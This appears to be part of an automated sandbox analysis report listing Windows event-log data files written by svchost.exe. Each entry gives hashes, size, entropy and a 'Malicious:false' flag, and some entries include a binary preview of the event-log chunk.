                                                                                                    SHA-256:418F39A1280B2C34368342BF2B6D112464C313193CEA3D327AEA7AE6AAAE2B9F
                                                                                                    SHA-512:0B3E054F154BB92470A1B77D8650C876217AE655A9778AB7592A0F9F98B050056D9607705C4A26D258C41F04E2D5908273168C32E8C6683AE3047611223BBC4E
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.389052726027393
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:PhGN+3N6sNSNYNLNjNUSNbN6NHNRNbNYN0NsNZN7NhNLNPNhN8NdNixNAwNioNZN:PGvsbF1QBjr1h8RE5kDYFX
                                                                                                    MD5:D00C86B2144A73E197F7EB1101EE55A0
                                                                                                    SHA1:7D9F6D7FE4AF26732C85F19F6F436C687C503221
                                                                                                    SHA-256:3E0AD86DCFB08C6A8369F268EF28A43209109D5EE98B0C896C19696E2EEA4CD1
                                                                                                    SHA-512:66AAFA38E71D2E5CC380B23B9DDDE4E30FB2D805719E251E94B61DD5C0890D8D354152D918ECAF9C41FDD6137F3118CB778F29685C04ECEFF45FED7BA2401F13
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76784
                                                                                                    Entropy (8bit):4.22400854562245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:z6r2V+VmV9V0VGVaVAVEV3V5VfuxVBVYzVHVPVnVGVdVhV9VsVi6rGOhcbVoVGxm:z6c6COO/DE
                                                                                                    MD5:9EB93F6939A0A3E5F5478EBCE55C50AF
                                                                                                    SHA1:1D30F200736B5FB388AD2C4667295C779043AA22
                                                                                                    SHA-256:63CA61BD5711E5938A03BD4193DA8F9EC412F992BE3CF24ED5832C50DC864A89
                                                                                                    SHA-512:BEC0BE678D62D357A5D5DDC9D73D7791083FDDB19F36A0DF272C32ACA110687BA809B692ED75DD328B43C74A77063E91EDBB290E27452A09566DFE9BAD4C338C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.426118770462063
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:YhsmYDQlm9cKrRtUmNmHumtTmgm5wQXvZ7bmO8mfQE3mq9mqmxqm6nFmCWmnsngS:YMrJcWHvqisqnvokZRKDSTSPnSKn
                                                                                                    MD5:6CFCE5264B03874517AA6A241A8712CC
                                                                                                    SHA1:578077104B758C95EDEDBC3C0928D8CF7FDB0197
                                                                                                    SHA-256:FEF379560AC56A639FFDA5047E65813DE46BEB245DF43727B9C97B5090682636
                                                                                                    SHA-512:EE3281EF8E843F0F019C530A4CE7806963A34F4EED7E8B30BF8EDB2D23639C792ACEEAA2DEB21E1DA6A483766982E2054A19651D77EC811A0CEE6934D4671184
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.46200461277087884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:VNVaO8sMa3Z85ZMLe5yrjjv3Z85ZCtV3Z85Z63Z85Zu:fV7pp8nMLe8vvp8nCtVp8n6p8n
                                                                                                    MD5:C6929DB77108728E343BCE40259E0BAC
                                                                                                    SHA1:604C49BFE289109840D00562C42959B3CF82CB77
                                                                                                    SHA-256:5C2EBD5E8EA3E9AEEF114C9E30A5093D86B124C41BE4B5D2F7D0D8E59567663F
                                                                                                    SHA-512:B0B3550BCE3B37618AA5A0CA44E3CB133D064FCC0A79F89DF8A7919FEA8BD8CB0EAF4B4A58F625FA8DAE3FF8A5A82DAFEF935355EA711E8061DE1D8FFB444967
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.8379894896429115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Vhv3Iqd5e3T3IQ3W3yD3C3Bq313nQ3s13sJ:VTRwgEjWJ
                                                                                                    MD5:B078FFE7DE6C5CF7C1ED91A26847D26C
                                                                                                    SHA1:B3A7F040C30D8E292F773E33B440CFDFCC893A92
                                                                                                    SHA-256:8E46EE6EA8630FC9262C42199E2047FBA64D95AF37D0FEF4AEEA06D077089596
                                                                                                    SHA-512:8C925B820112D38F7EF13487E30AE461DDF7F427766F8B51939728E2375FCDCDDB00DB1E877D4EDBB10FB3AD8C7E1DE6A4C6B3D7AA88E10831BB19038DE3D213
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 5 chunks (no. 4 in use), next record no. 397, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):120552
                                                                                                    Entropy (8bit):4.516142412940574
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:R2YHMtCwJYJRJ0D8IqRISAaH4X2YHMtCwJYJRJ0D8IqRISAaH4XzbubAb3b:UYstr677Ystr67K68z
                                                                                                    MD5:906A7E86F5A644CAD27B0C5B93E3339D
                                                                                                    SHA1:2DE94FAAAF599462D7367B9C8E1CF0F8138F3686
                                                                                                    SHA-256:BF782324845E3077C7D33A3DD7895518C865A8D8570D216D69D7650B2B771FF7
                                                                                                    SHA-512:467258CB07EBA37693183BD5726B43AE56C203FE475C5E0FCD5B077725950F6A5FC5E1A656AD3CD699A8F86194C8F0EB26C58275F761A15CDFBB2C7FB024216C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.709459105953104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ED1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9ZFN9NxKafEa9Ff:PnVYIyyqED5BVZUeJ+EsiA881rXTBr
                                                                                                    MD5:C6B0C1A87A8E4EFE9E0EB65607DE8626
                                                                                                    SHA1:CD9AD7BCC7900B181F10DC0F882CD6F7A0925EDE
                                                                                                    SHA-256:76076A93B78C35830563B968788EDEFF8F07292BB19381FD90AFF74135B36C51
                                                                                                    SHA-512:4F4E9AEEC781659E6C388185483D503CDAC06A720B07546196CB3DA39A8B3BF5E1683AF37DF07F5EA0636AFA8BE99DAADAB6714230D425C9A76F21B9071FFE8B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):92880
                                                                                                    Entropy (8bit):2.5819246932462736
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorrTo9orForAorlor1:/DCpVRmi+2DCpVRmi+h
                                                                                                    MD5:4B35F2F1ED83ADB2A77AEA631E101891
                                                                                                    SHA1:A55C788A1E5A4D1E10308273119F91CC577EBC6D
                                                                                                    SHA-256:AE36B4E15C048CCE09886A43244193AC5EB5BD6F890A3EEBA890D334ACC825EE
                                                                                                    SHA-512:2448DBE2A8D56A6316244C5B93D6FF83CEB990F1C0DEF3ED7D248DCE54066C2579B4E2D014BF9B2EC009A46018E9EA2AD2CD89459848F03BFEF080576E2DD278
                                                                                                    Malicious:false
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9396510419138993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lrhAiPA5PNPxPEPHPhPEPmPSPRP3PoP1P0mPQP1P9xPkP9PlP:lr2Nz
                                                                                                    MD5:B72758CCEE8512796B5C0B20E650238B
                                                                                                    SHA1:B06916A4448F31BFA8E873AACE5354558E63F84B
                                                                                                    SHA-256:4E39F3C5D4C7B4A31A4ED8A5EF3EB1D2A1E3534B30A190490634E7AE22A78185
                                                                                                    SHA-512:663DA2530558C0B3E0E24DFB361DA376C94661E26F2D062FA9F858F313010A62979B12E53725C13B09C7FE2167E65FBD93A249AEB80CD9ACDF2C801EBA88037D
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................)..(+....a$........................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9305587103691081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:khZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lr:kWXSYieD+tvgzmMvG5m2a0lFT
                                                                                                    MD5:CD17F01CA17AC4D3AD87F61331DD6C98
                                                                                                    SHA1:07FC334341A4F26B94425F42657314D6BDA5C8B4
                                                                                                    SHA-256:96D54D59389EA69726AA8664CDCE78EB648061A397DBCBFD3501F1F08B4E01C5
                                                                                                    SHA-512:716CB006CC286BC86B8171B3E6CB3BCF5A72335EF9C87DAD6C3963424E928C0A6033623CF6101AAB2F36EBD3CDCA91D91AE1FD272F417B9D0541A07163C10D83
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................)...*..S90w....................................................................`#..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................&...........**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.4679941088326207
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:hhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28c:hbCyhLfISidW/l
                                                                                                    MD5:F5554CB9BDD51A99B83E806331C85D81
                                                                                                    SHA1:36274EBB088762C7EBD6C9CA03079E654B2B21CC
                                                                                                    SHA-256:B49CD1A02F754F55284F3488990F327A8B95AD3E43A257C09DB4A42E8F21F590
                                                                                                    SHA-512:C55987D0372EDB7B81A50FC979BD2F23DC19063FF3054B49036F81C2D9EE8DFAA8B75E885CF48B31D2D90994D6E89895E5E6F0A37D40E84EDCD47616AF653092
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........W...............W...........h...0....I2.....................................................................h.`h................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n............................................................................v..........**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 84, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):117248
                                                                                                    Entropy (8bit):3.9004488546825997
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VcMhFBuyKskZljdoKXjtT/r18rQXn8iLqa37ueocMhFBuyKskZljdoKXjtT/r180:2MhFBuVvMhFBuV
                                                                                                    MD5:EE91DBEC5E83520307077734B075AC3A
                                                                                                    SHA1:4176D2334922FEDA0A60DDBC7528F6E406EE9F84
                                                                                                    SHA-256:695088D5B20E600C2F032A54B24D469C0141F5BF372D2B16BBDEE619E7A4D11B
                                                                                                    SHA-512:7CF151A51FFF28F07F8CC79C597CE17BEFCB752D6EAB4424828FC1754850FFBF875BD4DE57B1B6FAF0249F31D56AEAE9E1476BA7C8DD1EBAC2DA6F948899D089
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.................T......................................................................................................ElfChnk.........T...............T...................$Q..........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.907683624643196
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MreAs/1/sPFsqBCBao/F6Cf2SEqEhwaK41HZaWRSgELNnLi:QHf
                                                                                                    MD5:9096105EBBA2D15F1B9899F3CF01DFF2
                                                                                                    SHA1:D4869CC54A2461E84465AD04FE47C4CF16D7DBA5
                                                                                                    SHA-256:B0A19F472669166AEBA8589255637C2420C2659B14A75AF7F0DB09346EBC63C8
                                                                                                    SHA-512:4E5B2B5E63BB4D0FCE47DD181F91D4CE67E39873C4259ACC623429D7F40AEBEEC5215AC9951D60C06209603FDC87B314B8B8F0063685D9BBE0B95085B3A5CE38
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.v...............v................... 5..07...c"......................................................................v..........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..@...v.......<..:..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.1348078088545632
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDY:EMAP1Qa5AgfQQne
                                                                                                    MD5:7A88448FB4BA38F64C1B093E3E75D8F6
                                                                                                    SHA1:DCB056F09076BA9B68F7E6DC3CA8CFE35B14B8DB
                                                                                                    SHA-256:FF6F79517DA66B7561BAD2EA233EDE6270B1D1AC9E73D6A7BFE884F072F5BA17
                                                                                                    SHA-512:3FA44EEB57CB1352EA4F6F621D496C7E5B8BAC2E6E020581A9D76EFE09DC68A97BDB96669E66DEA37449B6A1085302E0DF0E311E63CD15E0492B9B6AF653DB55
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................l...o...%.......................................................................]E.................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&..............;....................R..........**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):4.43902002933379
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:UBh2/Echh8E09ENiEGJvJLENoE8REXuEFfPEHJEGEHlEeE1EoEcEeE4FEXhEbEyR:uuO9C+GhVsXdyTKuA
                                                                                                    MD5:33C45A6D76DDB9C70BD5678C5AD572EE
                                                                                                    SHA1:594008960FD7577699237ADAC7283FD28E725363
                                                                                                    SHA-256:25A38A95FA81B277D5F9EB9F073C7FB3FACC93134B76A220A9AF8D5C02C9A433
                                                                                                    SHA-512:733C3198BA7F937DDE4430EE5EAFFE2EA046BB529B00F6C16471BB0924E1A80572689E4FFC0C1C9143EC39129333C2FD25E3C87CA87BE4D458FDFCBF55BBE579
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........>...............>............q...s....c......................................................................f..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F....................)...............'...B..=3..................-...........]....>......U!..............}5......./...........-..........%...e<......**................wpc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):3.82808258474476
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ahYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kln:a1T4hy3V3
                                                                                                    MD5:B5FC8A6DCA2BA348AA93E13A74296430
                                                                                                    SHA1:E240F286D1D8819A24D604E3FC05DCD0912435AB
                                                                                                    SHA-256:C7ECA77BDD22B581A47984EFC6ED8F2F2C7150D05A9E9C058F9885258C9209FD
                                                                                                    SHA-512:ADAD36651D6C62B11234589D0286E9192150377FC1E4BE8206C9AF2A42811072314B430116C8D223623F99415FFF6355A8F6DF6DC46045592A7A40DA2AB988B2
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........................................`.....\F....................................................................Z...................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../...........n...........**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.8263275752843215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:NhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDf6:NzSKEqsMuy645tZtPNIW
                                                                                                    MD5:46903C3074471A90620BA44CF650BF7E
                                                                                                    SHA1:CE3CAD2CF05299A1F3408C880434809448C14052
                                                                                                    SHA-256:C6689BD19C1A2865C6BBD31ADBF2AAC454392D306A94A6AA1A6B36F7D9B84512
                                                                                                    SHA-512:BEC53E08B496EE257D5D3C3DA9153147FF43671232C4A6C1FDE65EDC3E95C54CB85447D90FE6A003B0E20C1EAE367135F8EF0F42B74622AAB8EA3E124CF2C809
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........\...............\.............................................................................................wt................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=....................................................................`..........**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):2.4180762032715353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:thMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zD:tmw9g3Lf
                                                                                                    MD5:AE1839474F96911E4EE3332A8425DA24
                                                                                                    SHA1:597ECD9B28AF1D1298ABAA79A551024FB17964A9
                                                                                                    SHA-256:8F1B75DD1B05AA9B5DC87BBD50C245DE46AB7CD03B6A209EEC5D80D9CABABE98
                                                                                                    SHA-512:C85C7900D5209CB93EF60FC7E192752C26AE5E651F2770C66F765C6FFDB90C8B339B6A4CA7E08404B3E9F1E9801A2A053A2C1F70E59CF1292A7D2725C2F45EC4
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.........?...............?...........................................................................................Hu..................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#....................................................................X..........**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.874446760990172
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:LhNIII0IVI2IqIBI9IwI2IzuxILIHImIiIKIyIiI:LHu
                                                                                                    MD5:DE41AB84B1966634E7F284CBE03FBFB7
                                                                                                    SHA1:6DF9366EADE699092EAAC0D89ABF7C1A79ADB7EA
                                                                                                    SHA-256:26A935203EE735630DD2E6030D4FD237933EB2B1225D059AFCD9075BF67D52D2
                                                                                                    SHA-512:102F865755B94F01AEDA2BB3ACC25D9952C9C671734E9D309222820CD75DD37720A4CABB8F67DAB8240AB228DDAB1E21799F1860D3B9AE059794C266ED7AB3A9
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk.\.......\.......\.......\....................bR.....................................................................<%..................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**......\.........}.c.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:MS Windows Vista Event Log, 16 chunks (no. 15 in use), next record no. 466, DIRTY
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105648
                                                                                                    Entropy (8bit):4.865089386568948
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Zyh1a51zuzNz0zxzuewKWMKhsa53FVJZa5qfua5n9R9o2KGzyzIz1a5ksR9o2KGU:YpxV9yVhN7pxV9yVhN
                                                                                                    MD5:EEC1A5C6358577C11ABAD96FDB025E45
                                                                                                    SHA1:9A6D61D7A1B9C3352E67F72AF87D1BC729B692C2
                                                                                                    SHA-256:7A494B1ACD10CF1D90B44522C05204B4914FB9E419EB136A31550CE9D6CD8FA4
                                                                                                    SHA-512:611BE82BB10A8C3DBD07824F2EB83A54EC3006627F6B72B39BD75B0326F9E495AB0DCD4F5B8FF8AE7F6A9C95AFDA835C768258DFA2D31CD93E13ED07933D69C5
                                                                                                    Malicious:false
                                                                                                    Preview:ElfFile.....................................................................................................................-...ElfChnk.....................................H...0.....u.......................................................................9.................".......................J...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................)...........**................Zyc.........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):1.1165373073916258
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:th1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMGmMqb+MvhMIv:teJWU
                                                                                                    MD5:23C3984CFC80D5EB368265BC60320FBB
                                                                                                    SHA1:28D8A2708573E7F572958A50C305565F47D44597
                                                                                                    SHA-256:B0724E891E7D9D36FB89BA438B5A38BAB643F3F69E70A3CFBA3EED70F395F7E6
                                                                                                    SHA-512:B20C58FAE6F74D130174BC3727627D7F8C76AF784B9670115788D17D1A4DC9C4FA5EAFA27DC4A1F822DE840A1A19BDB2261822D0DC26FCF1B0D26077F3EC6355
                                                                                                    Malicious:false
                                                                                                    Preview:ElfChnk......................................1..p3..........................................................................V..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................%..........**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.9578182571950208
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Vhb1m1z1c1j1Y1z11L1b1X1j1Hs1z1j1m1E1b1:V8
                                                                                                    MD5:43DC6997B50EF80E595FA910F7F55726
                                                                                                    SHA1:7E630EB4F2554D625B807271F6DA8605AB75CC03
                                                                                                    SHA-256:53B3DA45A1EA1425070F1086CC5DF7E7AE20042408945B6AC47F17A065AE2AAD
                                                                                                    SHA-512:D9904C2282D5C9FCABD158407A137AB84FC5C6AACE3817F5208E9E3D158FFE98247C2AC184CA6D69FAF423937FE2B77295FA2BCA284EEE5093C805C674831AD6
                                                                                                    Malicious:false
